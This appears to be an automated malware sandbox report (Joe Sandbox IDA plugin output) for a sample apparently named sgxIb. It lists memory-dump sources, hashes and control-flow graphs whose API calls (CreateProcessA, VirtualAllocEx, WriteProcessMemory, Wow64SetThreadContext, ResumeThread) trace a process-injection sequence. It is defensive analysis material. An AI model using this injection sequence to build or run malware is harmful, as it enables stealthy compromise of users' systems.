                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: efe36be1dae20961f9f4e34af3d0a15c5119a196b2af7869dfba36de2d93d80a
                                                                                                                    • Instruction ID: 6f114dfe4fa6587cd09c197742e936b4c06ffd9f6b2e2f5e901a0c52e30ad08c
                                                                                                                    • Opcode Fuzzy Hash: efe36be1dae20961f9f4e34af3d0a15c5119a196b2af7869dfba36de2d93d80a
                                                                                                                    • Instruction Fuzzy Hash: 8FB11D30E102198FDB58FF68D99466EB7B2BF84305F248829D41A9B354DB79DC86CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                    • API String ID: 0-2454687669
                                                                                                                    • Opcode ID: a0ac2ac05307a64f7ae402eb5802501207bce731faf367142c2fe74c39f9da86
                                                                                                                    • Instruction ID: a927173f6253525ee16555660e888e311d6550183de70490ecb8731dc5ff8b07
                                                                                                                    • Opcode Fuzzy Hash: a0ac2ac05307a64f7ae402eb5802501207bce731faf367142c2fe74c39f9da86
                                                                                                                    • Instruction Fuzzy Hash: A851B031B102018FDB58FB28D890A6EB7F6BFC5301B108968E4159F399DB35EC41CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: d81ea41d2e0b1ac3693117eb9aae7d23c85d332f19321c3d57cc1dd56d5b890f
                                                                                                                    • Instruction ID: 39a616362e4b2e1fc8f5aec6c9e7e6d4f68ae086b3072101ffecf073a1dad170
                                                                                                                    • Opcode Fuzzy Hash: d81ea41d2e0b1ac3693117eb9aae7d23c85d332f19321c3d57cc1dd56d5b890f
                                                                                                                    • Instruction Fuzzy Hash: 13517971E112158BDB69FB64D9806AEB7B2EFC5301F208929E916DF358DB31DC41CB90

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.9%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:104
                                                                                                                    Total number of Limit Nodes:8
                                                                                                                    execution_graph 26567 b821c82 26571 b822770 26567->26571 26574 b822778 26567->26574 26568 b821c96 26572 b8227c0 VirtualProtect 26571->26572 26573 b8227fa 26572->26573 26573->26568 26575 b8227c0 VirtualProtect 26574->26575 26576 b8227fa 26575->26576 26576->26568 26656 1a0d000 26657 1a0d046 GetCurrentProcess 26656->26657 26659 1a0d098 GetCurrentThread 26657->26659 26662 1a0d091 26657->26662 26660 1a0d0d5 GetCurrentProcess 26659->26660 26661 1a0d0ce 26659->26661 26663 1a0d10b 26660->26663 26661->26660 26662->26659 26664 1a0d133 GetCurrentThreadId 26663->26664 26665 1a0d164 26664->26665 26666 b8004a3 26669 b82ef08 26666->26669 26670 b82ef91 26669->26670 26670->26670 26671 b82f0f6 CreateProcessA 26670->26671 26672 b82f153 26671->26672 26577 b800c85 26578 b800c8b 26577->26578 26581 b82ec80 26578->26581 26582 b82ecc8 WriteProcessMemory 26581->26582 26584 b800db9 26582->26584 26673 b8008a7 26675 b8005eb 26673->26675 26674 b8008e8 26675->26674 26678 b82ea38 26675->26678 26679 b82ea78 ResumeThread 26678->26679 26681 b800600 26679->26681 26585 1a04668 26586 1a04672 26585->26586 26588 1a04759 26585->26588 26589 1a0477d 26588->26589 26593 1a04858 26589->26593 26597 1a04868 26589->26597 26594 1a0488f 26593->26594 26595 1a0496c 26594->26595 26601 1a044b0 26594->26601 26599 1a0488f 26597->26599 26598 1a0496c 26599->26598 26600 1a044b0 CreateActCtxA 26599->26600 26600->26598 26602 1a058f8 CreateActCtxA 26601->26602 26604 1a059bb 26602->26604 26682 b8012e8 26683 b80130e 26682->26683 26684 b801473 26682->26684 26683->26684 26688 b801562 PostMessageW 26683->26688 26690 b801568 PostMessageW 26683->26690 26692 b8015f8 26683->26692 26689 b8015d4 26688->26689 26689->26683 26691 b8015d4 26690->26691 26691->26683 26693 b8015b5 PostMessageW 26692->26693 26695 b8015fb 26692->26695 26694 b8015d4 26693->26694 26694->26683 26695->26683 26696 b800929 26697 b80094c 26696->26697 26699 b82ec80 WriteProcessMemory 26697->26699 26698 b800bf3 26699->26698 26609 b800d0b 26612 b82ebc0 26609->26612 26613 b82ec00 VirtualAllocEx 26612->26613 26615 b800d29 26613->26615 26704 b82046c 26706 b822770 VirtualProtect 26704->26706 26707 b822778 VirtualProtect 26704->26707 26705 b82049d 26706->26705 26707->26705 26620 1a0ac70 26623 1a0ad68 26620->26623 26621 1a0ac7f 26624 1a0ad9c 26623->26624 26625 1a0ad79 26623->26625 26624->26621 26625->26624 26626 1a0afa0 GetModuleHandleW 26625->26626 26627 1a0afcd 26626->26627 26627->26621 26708 1a0d650 DuplicateHandle 26709 1a0d6e6 26708->26709 26632 b800a98 26633 b800abe 26632->26633 26636 b82ed70 26633->26636 26637 b82edbb ReadProcessMemory 26636->26637 26639 b800ae0 26637->26639 26640 b800819 26644 b801228 26640->26644 26648 b80121a 26640->26648 26641 b800831 26645 b80123d 26644->26645 26652 b82eae8 26645->26652 26649 b80123d 26648->26649 26651 b82eae8 Wow64SetThreadContext 26649->26651 26650 b801253 26650->26641 26651->26650 26653 b82eb2d Wow64SetThreadContext 26652->26653 26655 b801253 26653->26655 26655->26641 26710 b821179 26711 b82117c 26710->26711 26712 b8211e1 26711->26712 26713 b822770 VirtualProtect 26711->26713 26714 b822778 VirtualProtect 26711->26714 26713->26711 26714->26711 26715 b8006bb 26716 b8009a6 26715->26716 26718 b82eae8 Wow64SetThreadContext 26716->26718 26717 b8009c1 26718->26717

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 294 1a0cff1-1a0d08f GetCurrentProcess 298 1a0d091-1a0d097 294->298 299 1a0d098-1a0d0cc GetCurrentThread 294->299 298->299 300 1a0d0d5-1a0d109 GetCurrentProcess 299->300 301 1a0d0ce-1a0d0d4 299->301 303 1a0d112-1a0d12d call 1a0d5d8 300->303 304 1a0d10b-1a0d111 300->304 301->300 307 1a0d133-1a0d162 GetCurrentThreadId 303->307 304->303 308 1a0d164-1a0d16a 307->308 309 1a0d16b-1a0d1cd 307->309 308->309
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 01A0D07E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 01A0D0BB
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 01A0D0F8
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 01A0D151
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1914028477.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_1a00000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: db20c7e16ccb3d86bf26de46df2608a77b71f77327142a5ee0dc51f82ae9d9c9
                                                                                                                    • Instruction ID: aae7e9ab5de8320c08b4890178e44abae04bb5d9e0742bad63a6dec1583a2d52
                                                                                                                    • Opcode Fuzzy Hash: db20c7e16ccb3d86bf26de46df2608a77b71f77327142a5ee0dc51f82ae9d9c9
                                                                                                                    • Instruction Fuzzy Hash: E85157B19003098FEB14DFA9D548B9EBFF1EF48314F248459E41AAB3A0DB749984CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 316 1a0d000-1a0d08f GetCurrentProcess 320 1a0d091-1a0d097 316->320 321 1a0d098-1a0d0cc GetCurrentThread 316->321 320->321 322 1a0d0d5-1a0d109 GetCurrentProcess 321->322 323 1a0d0ce-1a0d0d4 321->323 325 1a0d112-1a0d12d call 1a0d5d8 322->325 326 1a0d10b-1a0d111 322->326 323->322 329 1a0d133-1a0d162 GetCurrentThreadId 325->329 326->325 330 1a0d164-1a0d16a 329->330 331 1a0d16b-1a0d1cd 329->331 330->331
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 01A0D07E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 01A0D0BB
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 01A0D0F8
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 01A0D151
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1914028477.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_1a00000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: a7f19120cb4dc89cd8dc20f825ec57512ef532fe8cbbe6ed7169c2af433f8ad1
                                                                                                                    • Instruction ID: a5db5088541b8898104d5bde7e84bc2a4846995a657200c983c272c5a28fc576
                                                                                                                    • Opcode Fuzzy Hash: a7f19120cb4dc89cd8dc20f825ec57512ef532fe8cbbe6ed7169c2af433f8ad1
                                                                                                                    • Instruction Fuzzy Hash: E05147B19003098FEB14DFA9D548B9EBBF1EF48314F208459E419AB3A0DB745984CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 437 b82ef08-b82ef9d 439 b82efd6-b82eff6 437->439 440 b82ef9f-b82efa9 437->440 447 b82eff8-b82f002 439->447 448 b82f02f-b82f05e 439->448 440->439 441 b82efab-b82efad 440->441 442 b82efd0-b82efd3 441->442 443 b82efaf-b82efb9 441->443 442->439 445 b82efbb 443->445 446 b82efbd-b82efcc 443->446 445->446 446->446 449 b82efce 446->449 447->448 450 b82f004-b82f006 447->450 454 b82f060-b82f06a 448->454 455 b82f097-b82f151 CreateProcessA 448->455 449->442 452 b82f008-b82f012 450->452 453 b82f029-b82f02c 450->453 456 b82f016-b82f025 452->456 457 b82f014 452->457 453->448 454->455 458 b82f06c-b82f06e 454->458 468 b82f153-b82f159 455->468 469 b82f15a-b82f1e0 455->469 456->456 459 b82f027 456->459 457->456 460 b82f070-b82f07a 458->460 461 b82f091-b82f094 458->461 459->453 463 b82f07e-b82f08d 460->463 464 b82f07c 460->464 461->455 463->463 465 b82f08f 463->465 464->463 465->461 468->469 479 b82f1e2-b82f1e6 469->479 480 b82f1f0-b82f1f4 469->480 479->480 481 b82f1e8 479->481 482 b82f1f6-b82f1fa 480->482 483 b82f204-b82f208 480->483 481->480 482->483 484 b82f1fc 482->484 485 b82f20a-b82f20e 483->485 486 b82f218-b82f21c 483->486 484->483 485->486 489 b82f210 485->489 487 b82f22e-b82f235 486->487 488 b82f21e-b82f224 486->488 490 b82f237-b82f246 487->490 491 b82f24c 487->491 488->487 489->486 490->491
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B82F13E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922508497.000000000B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B820000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b820000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 1342eec363e463f1f9b4019bf0f8cb6e2e0c9338b3ab12274f267352209453c0
                                                                                                                    • Instruction ID: 22f92ae6aa7c253563272de1d332e136c292186585457b88dab240c565e42623
                                                                                                                    • Opcode Fuzzy Hash: 1342eec363e463f1f9b4019bf0f8cb6e2e0c9338b3ab12274f267352209453c0
                                                                                                                    • Instruction Fuzzy Hash: 6A915D71D0032A9FDB24DFA8C8407DEBBB2BF45314F1485A9D909E7290DB749985CF92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 493 1a0ad68-1a0ad77 494 1a0ada3-1a0ada7 493->494 495 1a0ad79-1a0ad86 call 1a0a08c 493->495 496 1a0ada9-1a0adb3 494->496 497 1a0adbb-1a0adfc 494->497 500 1a0ad88 495->500 501 1a0ad9c 495->501 496->497 504 1a0ae09-1a0ae17 497->504 505 1a0adfe-1a0ae06 497->505 550 1a0ad8e call 1a0aff0 500->550 551 1a0ad8e call 1a0b000 500->551 501->494 507 1a0ae19-1a0ae1e 504->507 508 1a0ae3b-1a0ae3d 504->508 505->504 506 1a0ad94-1a0ad96 506->501 511 1a0aed8-1a0af54 506->511 509 1a0ae20-1a0ae27 call 1a0a098 507->509 510 1a0ae29 507->510 512 1a0ae40-1a0ae47 508->512 514 1a0ae2b-1a0ae39 509->514 510->514 543 1a0af80-1a0af98 511->543 544 1a0af56-1a0af7e 511->544 515 1a0ae54-1a0ae5b 512->515 516 1a0ae49-1a0ae51 512->516 514->512 518 1a0ae68-1a0ae71 call 1a0a0a8 515->518 519 1a0ae5d-1a0ae65 515->519 516->515 524 1a0ae73-1a0ae7b 518->524 525 1a0ae7e-1a0ae83 518->525 519->518 524->525 527 1a0aea1-1a0aea5 525->527 528 1a0ae85-1a0ae8c 525->528 532 1a0aeab-1a0aeae 527->532 528->527 529 1a0ae8e-1a0ae9e call 1a0a0b8 call 1a0a0c8 528->529 529->527 534 1a0aeb0-1a0aece 532->534 535 1a0aed1-1a0aed7 532->535 534->535 545 1a0afa0-1a0afcb GetModuleHandleW 543->545 546 1a0af9a-1a0af9d 543->546 544->543 547 1a0afd4-1a0afe8 545->547 548 1a0afcd-1a0afd3 545->548 546->545 548->547 550->506 551->506
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 01A0AFBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1914028477.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_1a00000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 25573073a3b507d3263d210576257e3153dc8fee43f54b7a3ef0974c1bd5d6b8
                                                                                                                    • Instruction ID: 62f542100925ffca1c8c2d03277b5ee28b3b564f7c7143eabb128e614691b40c
                                                                                                                    • Opcode Fuzzy Hash: 25573073a3b507d3263d210576257e3153dc8fee43f54b7a3ef0974c1bd5d6b8
                                                                                                                    • Instruction Fuzzy Hash: 858168B0A00B058FD725DF69E44475ABBF1FF88304F04892ED08ADBA91DB74E849CB90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 552 1a058ed-1a058f4 553 1a05891-1a058b9 552->553 554 1a058f6-1a059b9 CreateActCtxA 552->554 557 1a058c2-1a058e3 553->557 558 1a058bb-1a058c1 553->558 559 1a059c2-1a05a1c 554->559 560 1a059bb-1a059c1 554->560 558->557 568 1a05a2b-1a05a2f 559->568 569 1a05a1e-1a05a21 559->569 560->559 570 1a05a40 568->570 571 1a05a31-1a05a3d 568->571 569->568 572 1a05a41 570->572 571->570 572->572
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01A059A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1914028477.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_1a00000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: 2da3cf36dbeee00d6995bf6456da0a867b8d6a3140fa9e0b91db9d62f85287e8
                                                                                                                    • Instruction ID: 21b83425a1056e864bcbe1bd60b5b897fb691a188da8e66448a603f504c6528d
                                                                                                                    • Opcode Fuzzy Hash: 2da3cf36dbeee00d6995bf6456da0a867b8d6a3140fa9e0b91db9d62f85287e8
                                                                                                                    • Instruction Fuzzy Hash: C55100B1C007198EDB24CFA9D8887DDBBF1AF49314F24806AD419AB291C779694ACF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 574 1a044b0-1a059b9 CreateActCtxA 577 1a059c2-1a05a1c 574->577 578 1a059bb-1a059c1 574->578 585 1a05a2b-1a05a2f 577->585 586 1a05a1e-1a05a21 577->586 578->577 587 1a05a40 585->587 588 1a05a31-1a05a3d 585->588 586->585 589 1a05a41 587->589 588->587 589->589
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01A059A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1914028477.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_1a00000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: e29f146c9de4be63ce96d1e86c685856ac473d1dcba9c6511ddba4120b798c0b
                                                                                                                    • Instruction ID: c4a46f3a45873d8fe5c62fd0298cab06230275e45a644f9fdbac9e6a0cc1ba24
                                                                                                                    • Opcode Fuzzy Hash: e29f146c9de4be63ce96d1e86c685856ac473d1dcba9c6511ddba4120b798c0b
                                                                                                                    • Instruction Fuzzy Hash: B241F1B0C0071DCFDB24DFA9C884B9DBBB5BF49304F20806AD409AB251DB756946CF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 591 b82ec80-b82ecce 593 b82ecd0-b82ecdc 591->593 594 b82ecde-b82ed1d WriteProcessMemory 591->594 593->594 596 b82ed26-b82ed56 594->596 597 b82ed1f-b82ed25 594->597 597->596
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B82ED10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922508497.000000000B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B820000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b820000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: 33b067d0c6001903d71c07b2d33e30b6fd5f0652910e79d25eb32f519ab8ed5e
                                                                                                                    • Instruction ID: aa992d2e0ee4b41ab4e779a67986f836be9b846d7a6c0ae959ae5a23f36df4ed
                                                                                                                    • Opcode Fuzzy Hash: 33b067d0c6001903d71c07b2d33e30b6fd5f0652910e79d25eb32f519ab8ed5e
                                                                                                                    • Instruction Fuzzy Hash: E82139B19003199FCB10DFA9C885BDEBBF5FF48310F10842AE959A7251C778A954DBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 601 b8015f8-b8015f9 602 b8015b5-b8015d2 PostMessageW 601->602 603 b8015fb-b80162d 601->603 604 b8015d4-b8015da 602->604 605 b8015db-b8015ef 602->605 608 b801634-b801647 603->608 609 b80162f 603->609 604->605 612 b801658-b801673 608->612 613 b801649-b801656 608->613 609->608 616 b801675 612->616 617 b80167d-b801691 612->617 613->612 616->617 619 b801693-b8016ab 617->619 620 b80164d-b801655 617->620 621 b8016ad-b8016c4 619->621 622 b8016ce-b8016d1 619->622 620->612 621->622 625 b8016c6-b8016cb 621->625 625->622
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0B8015C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922431803.000000000B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b800000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 16eecf67cb7ecd5ca1065dc01cd037c3e10fd8bb898f8dd0e9423b8596230258
                                                                                                                    • Instruction ID: 720785a3a0902335b2fc0bec09e65c32e4ffd1b0479374228018e5e82f0512f9
                                                                                                                    • Opcode Fuzzy Hash: 16eecf67cb7ecd5ca1065dc01cd037c3e10fd8bb898f8dd0e9423b8596230258
                                                                                                                    • Instruction Fuzzy Hash: 73219FB29152588FDB10EFA5DC0A7DEBBF4AB44360F148059E511BB2A1CB35A944CBA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 626 b82eae8-b82eb33 628 b82eb43-b82eb73 Wow64SetThreadContext 626->628 629 b82eb35-b82eb41 626->629 631 b82eb75-b82eb7b 628->631 632 b82eb7c-b82ebac 628->632 629->628 631->632
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B82EB66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922508497.000000000B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B820000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b820000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: 6dbc537497f123ef894dd4517bcb992612893e7a03ca2fc05f896e9f8e1ea182
                                                                                                                    • Instruction ID: 3d6007363567a09410ce1edc812c803fac98bfbf9a75c993903c0f817f1966fb
                                                                                                                    • Opcode Fuzzy Hash: 6dbc537497f123ef894dd4517bcb992612893e7a03ca2fc05f896e9f8e1ea182
                                                                                                                    • Instruction Fuzzy Hash: 8A2138B19003098FDB10DFAAC4857EEBBF4EF88320F148429D519A7241CB78A984CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 636 b82ed70-b82edfd ReadProcessMemory 639 b82ee06-b82ee36 636->639 640 b82edff-b82ee05 636->640 640->639
                                                                                                                    APIs
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B82EDF0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922508497.000000000B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B820000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b820000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1726664587-0
                                                                                                                    • Opcode ID: 1ce5bd7d64d91b8581a1aa5043c9fdf1d223689055d6984b82745b495d9a762b
                                                                                                                    • Instruction ID: bf3ff14758220ae6b8203411c95f93e17eb7ae91d3c9a241ebe530fbc552fd24
                                                                                                                    • Opcode Fuzzy Hash: 1ce5bd7d64d91b8581a1aa5043c9fdf1d223689055d6984b82745b495d9a762b
                                                                                                                    • Instruction Fuzzy Hash: FB2128B18003599FCB10DFAAC845BDEFBF5FF48310F108429E519A7250C7749954DBA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 644 1a0d648-1a0d6e4 DuplicateHandle 645 1a0d6e6-1a0d6ec 644->645 646 1a0d6ed-1a0d70a 644->646 645->646
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01A0D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1914028477.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_1a00000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 006f72e55898688d4036ed47c99bea835526dc848c7fffaee8aa9b33d765df3c
                                                                                                                    • Instruction ID: 9a870961ebcc22c7e7415d076190358b7417e2839ef48952bcb41f5a43db2381
                                                                                                                    • Opcode Fuzzy Hash: 006f72e55898688d4036ed47c99bea835526dc848c7fffaee8aa9b33d765df3c
                                                                                                                    • Instruction Fuzzy Hash: B32114B5D002089FDB10CFA9D984ADEBFF4EB48310F14801AE958A7350C378A940DF60
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01A0D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1914028477.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_1a00000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 0566154db0af6b3ca89f6d8f48ce7f8334b129032a13cef05db540f0295ad380
                                                                                                                    • Instruction ID: c043a2d18c27c8a5a0ae5023940be29bbb0c8c5a5b5978fbe17cef824e3da186
                                                                                                                    • Opcode Fuzzy Hash: 0566154db0af6b3ca89f6d8f48ce7f8334b129032a13cef05db540f0295ad380
                                                                                                                    • Instruction Fuzzy Hash: B821E4B59002089FDB10CFAAD884ADEBFF4EB48310F14801AE918A7350D374A954DF65
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0B8227EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922508497.000000000B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B820000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b820000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: e5c1ecbe1514726009e742974f9c3000530522871aee4c235382885d607e7246
                                                                                                                    • Instruction ID: c79ea98fee98c2e195805c96293fa8f56267ef79d643a65375fff1c5bf6587f5
                                                                                                                    • Opcode Fuzzy Hash: e5c1ecbe1514726009e742974f9c3000530522871aee4c235382885d607e7246
                                                                                                                    • Instruction Fuzzy Hash: 4D2108B5D002499FCB10DF9AC544BDEBBF4FB48320F148469E958A7251D378A644CFA1
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0B8227EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922508497.000000000B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B820000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b820000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: e9527880c11068504882115cf888c48def6f61a60cb25c65ba1e199d6032228d
                                                                                                                    • Instruction ID: 4ad226a86f9c003d5907117dda71926a294e1046cf1a62a4d282cdc9ee4ba409
                                                                                                                    • Opcode Fuzzy Hash: e9527880c11068504882115cf888c48def6f61a60cb25c65ba1e199d6032228d
                                                                                                                    • Instruction Fuzzy Hash: 8921E4B59002499FCB10DF9AC884BDEFBF4FB48320F108429E958A7251D778A644CFA1
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B82EC2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.1922508497.000000000B820000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B820000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_b820000_sgxIb.jbxd
                                                                                                                    Similarity
